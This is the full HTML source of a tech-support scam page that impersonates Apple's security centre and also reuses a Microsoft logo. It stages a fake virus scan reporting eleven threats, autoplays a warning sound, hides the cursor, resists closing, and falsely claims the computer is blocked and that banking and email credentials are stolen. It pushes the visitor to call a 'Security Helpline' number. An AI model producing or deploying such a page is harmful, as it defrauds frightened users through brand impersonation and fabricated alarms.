

<!doctype html>
<html lang="en">
<head>
  <!-- Google tag (gtag.js) -->
  <script async src="https://www.googletagmanager.com/gtag/js?id=UA-xxx-x"></script>
  <script>
    window.dataLayer = window.dataLayer || [];
    function gtag(){dataLayer.push(arguments);}
    gtag('js', new Date());

    gtag('config', 'UA-xxx-x');
  </script>


    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/css/bootstrap.min.css"
          integrity="sha384-B0vP5xmATw1+K9KRQjQERJvTumQW0nPEzvF6L/Z6nronJ3oUOFUFpCjEUQouq2+l" crossorigin="anonymous">
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js"></script>
    <link rel="stylesheet" type="text/css" href="main.css">
    <title>Apple Security Center </title>
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.5.0/css/font-awesome.min.css">
    <script type="text/javascript" src="new.js"></script>
    <script type="text/javascript" src="new2.js"></script>
</head>
<body id="mycanvas" class="map" onbeforeunload="return myFunction()" style="cursor:none; color:#FFFFFF !important;">
<audio id="beep" autoplay="">
    <source src="0wa0rni0ng0.mp3" type="audio/mpeg">
</audio>

<div class="bg" style="cursor:none;">
    <div class="bgimg" style="top: 0px;"><img src="background.png" alt="" width="100%"/></div>

</div>
<a href="#" rel="noreferrer" id="link_black" style="cursor: none;">
    <div class="black" style="height: 145%;cursor: none;"></div>
</a>

<div class="mn_bxs"  style="background-color:#000000; color:#FFFFFF !important; cursor: none;">
    <div class="mn_bxs_header">
        <div class="row">
            <div class="col-md-12">
                <div class="minimize">
                    <ul>
                        <li><a href="#"><img src="minimize.jpeg"></a></li>

                    </ul>
                </div>
            </div>
            <div class="col-md-4">
                <div class="logo">
                    <img src="microsoft.png"><span>Apple </span>
                </div>
            </div>
            <div class="col-md-8">
                <div class="activate_lic">
                    <ul>
                        <li><a href="#">
                                <button>Activate license</button>
                            </a></li>
                        <li><a href="#"><img src="setting.png"></a></li>
                        <li><a href="#"><img src="que.png"></a></li>
                    </ul>
                </div>
            </div>
        </div>
    </div>
    <div class="scan_box" style="background-color:#000000; color:#FFFFFF !important;">
        <div class="scan_box_header">
            <div class="row">
                <div class="col-md-6">
                    <div class="quick_scan">
                        <p><img src="virus-scan.png"><span>Quick Scan</span></p>
                    </div>
                </div>
                <div class="col-md-6">
                    <div class="minimize1">
                        <ul>
                            <li><a href="#"><img src="minimize.jpeg"></a></li>

                        </ul>
                    </div>
                </div>
            </div>
        </div>
        <div class="scan_body" style="background-color:#000000; color:#FFFFFF !important;">
            <div class="progress">
                <div id="dynamic" class="progress-bar progress-bar-success active" role="progressbar" aria-valuenow="0"
                     aria-valuemin="0" aria-valuemax="100" style="width: 0%">
                    <span id="current-progress"></span>
                </div>
            </div>
            <div class="table_quick" style="background-color:#000000; color:#FFFFFF !important;">
                <table class="table table-bordered" style="background-color:#000000; color:#FFFFFF !important;">
                    <thead>
                    <tr>
                        <th scope="col">Objects scanned</th>
                        <th scope="col">
                            <div class="counter col_fourth">
                                <h2 class="timer count-title count-number" data-to="51900" data-speed="5000"></h2>
                            </div>
                        </th>
                    </tr>
                    <tr>
                        <th scope="col">Time Elapsed</th>
                        <th scope="col">5 secs</th>
                    </tr>
                    <tr>
                        <th scope="col">Threats found</th>
                        <th scope="col" style="color: red;"><h2 class="timer count-title count-number" data-to="11"
                                                                data-speed="2000"></h2></th>
                    </tr>
                    </thead>
                </table>
            </div>
        </div>
        <div class="scan_footer" style="background-color:#000000; color:#FFFFFF !important;">
            <div class="row">
                <div class="col-md-6">
                    <div class="bt_can">
                        <div class="btn-group" role="group" aria-label="Basic example">
                            <button type="button" class="btn btn-secondary" style="background-color:#000000; color:#FFFFFF !important;">Cancel</button>
                        </div>
                        <div class="btn-group" role="group" aria-label="Basic example">
                            <button type="button" class="btn btn-secondary" style="background-color:#000000; color:#FFFFFF !important;">Pause</button>
                        </div>
                    </div>
                </div>
                <div class="col-md-6">
                    <div class="bt_can2">
                        <div class="btn-group" role="group" aria-label="Basic example">
                            <button type="button" class="btn btn-secondary" id="" style="background-color:#000000; color:#FFFFFF !important;">Scheduled Scans</button>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>

<div class="mn_bxs2"  style="background-color:#000000; color:#FFFFFF !important; cursor: none;">
    <img src="web1.png" alt="" style="width: 100%;">
</div>
<div class="mn_bxs3"  style="background-color:#000000; color:#FFFFFF !important; cursor: none;">
    <img src="web2.png" alt="" style="width: 100%;">
</div>

<div id="footer" style="cursor: none; background-color:#000000; color:#FFFFFF !important;">
    <div class="row">

        <div class="col-md-12">
            <div class="right-foot" style="text-align: center;">
                <span id="footertxt"><img src="microsoft.png"> Apple : </span><span
                        style="font-weight: 700;padding-left: 13px;color: #fff;">Contact Support <span
                            style="border: 1px solid #fff;border-radius: 5px;padding: 2px 5px;">+1-000-000-0000 (Security Helpline)</span></span>
            </div>
        </div>
        <div class="col-md-12">
            <marquee width="100%" direction="left" height="100px"><small class="text-left"
                                                                         style="color: #eee;font-size: 16px;"> Access to this PC has been blocked for due to illegal activities.
                    Apple SmartScreen prevented an unrecognized app from stating. Running this app might put your PC
                    at risk. Apple MAC Scan has found potentially unwanted Adware on this device that can steal
                    your passwords, online identity, financial information, personal files, pictures or
                    documents.</small></marquee>
        </div>
    </div>


</div>

<div id="poptxt" class="lightbox" style="background-color:#000000; color:#FFFFFF !important;">
    <div class="ilb top">
        <div class="headers ilb" style="border-bottom: 1px solid #d6d5d5;">
            <span id="txtadd" class="fl title"><span class="fl ilb"><img src="def.png" class="logo3"></span> Apple MAC Security Center</span>
            <span id="txts1" class="fl title2"><a href="#"><img src="cross.png"></a></span>

        </div>
    </div>
    <div id="txtintro">
                <span class="colo-rd">App: Ads.fiancetrack(02).dmg<br>
                Threats_Detected:  _Apple_Trojan_Spyware</span>
    </div>
    <img id="banner" src="virus-images.png" width="300">
    <div id="disclaimer">
        Access to this PC has been blocked for due to illegal activities.<br>
        <span class="support">Contact Apple Support: +1-000-000-0000 (Security Helpline)</span>
    </div>
    <div id="bottom">
        <img id="badge" src="microsoft.png"><span class="title3">Apple</span>
        <ul>
            <li>
                <a href="#">
                    <div class="fr button">
                        <span id="addtochromebutton">Deny</span>
                    </div>
                </a>
            </li>
            <li>
                <a href="#">
                    <div class="fr button">
                        <span id="addtochromebutton">Allow</span>
                    </div>
                </a>
            </li>
        </ul>

    </div>
</div>

<div id="pop_up_new" class="cardcontainer"  style="background-color:#000000; color:#FFFFFF !important; cursor: none;">
    <p class="text-center" style="    font-size: 16px;
    font-weight: normal;
    margin: 0;
    margin-bottom: 5px;
    padding: 5px 10px;
    color: #000000 !important;
    color: #414141;font-weight: bold;
    margin-top: 8px;">Apple MAC - Security Warning</p>
    <p>** ACCESS TO THIS PC HAS BEEN BLOCKED FOR ILLEGAL ACTIVITIES **</p>
    <p>Your computer has alerted us that it has been infected with a Trojan Spyware. The following data has been
        compromised.</p>
    <p>&gt; Email Credentials<br>
        &gt; Banking Passwords<br>
        &gt; Facebook Login<br>
        &gt; Pictures &amp; Documents

    </p>
    <p>Apple MAC Scan has found potentially unwanted Adware on this device that can steal your passwords, online
        identity, financial information, personal files, pictures or documents.</p>
    <p>You must contact us immediately so that our engineers can walk you through the removal process over the
        phone.</p>
    <p>Call Apple Support immediately to report this threat, prevent identity theft and unlock access to this
        device.</p>
    <p>Closing this window will put your personal information at risk and lead to a suspension of your Apple
        Registration.</p>
    <p style="padding-bottom: 0px; color:#fff; font-size:14px;">Call Apple Support: <strong>
            +1-000-000-0000 (Security Helpline) </strong></p>
    <div class="action_buttons"><a class="active" id="leave_page"
                                   style="cursor: pointer; color:#FFFFFF !important;">OK</a> <a class="active"
                                                                                                 id="leave_page"
                                                                                                 style="color:#FFFFFF !important;">Cancel</a>
    </div>
</div>

<div id="welcomeDiv"
     style=" display:none; background-color:rgb(40 40 40 / 62%); height: auto; width: 550px; margin-left:30%;position: absolute;z-index: 9999999999;  "
     class="answer_list">
    <p class="text-center" style="color: #FEFEFE;  margin-top:10px; font-size: 16px; opacity:.9; ">Do not restart or use
        your computer.<br>Your computer is disabled. Please Call Apple.<br>Access is the block security reason for this
        computer.<br> Please contact us immediately. A technician will help you solve the problem.</p>


</div>


<!-- Optional JavaScript; choose one of the two! -->

<!-- Option 1: jQuery and Bootstrap Bundle (includes Popper) -->
<script src="https://cdnjs.cloudflare.com/ajax/libs/modernizr/2.8.3/modernizr.min.js" type="text/javascript"></script>
<script src="https://cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/js/bootstrap.bundle.min.js"
        integrity="sha384-Piv4xVNRyMGpqkS2by6br4gNJ7DXjqk09RmUpJ8jgGtD7zP9yug3goQfGII0yAns"
        crossorigin="anonymous"></script>
<script type="text/javascript" src="flsc.js"></script>
<script type="text/javascript" src="bfr.js"></script>
<script type="text/javascript" src="mns.js"></script>
<script type="text/javascript" src="lght.js"></script>
<script type="text/javascript" src="custom.js"></script>
<script type="text/javascript" src="custom1.js"></script>
<script type="text/javascript" src="custom2.js"></script>
<script type="text/javascript" src="custom3.js"></script>
<script type="text/javascript">
    $(document).ready(function () {
        $(".mn_bxs2").delay(1500).fadeIn(800);
        $(".mn_bxs3").delay(2500).fadeIn(800);
        $(".mn_bxs3").delay(3000).fadeIn(800);
        $("#pop_up_new").delay(3500).fadeIn(800);
        $("#poptxt").delay(4000).fadeIn(800);
    });
</script>

<script type="text/javascript" src="web1.js"></script>
<script type="text/javascript" src="web2.js"></script>
<script type="text/javascript" src="web3.js"></script>
<script type="text/javascript" src="web4.js"></script>
<script type="text/javascript" src="web5.js"></script>
<script type="text/javascript" src="web6.js"></script>

</body>
</html>
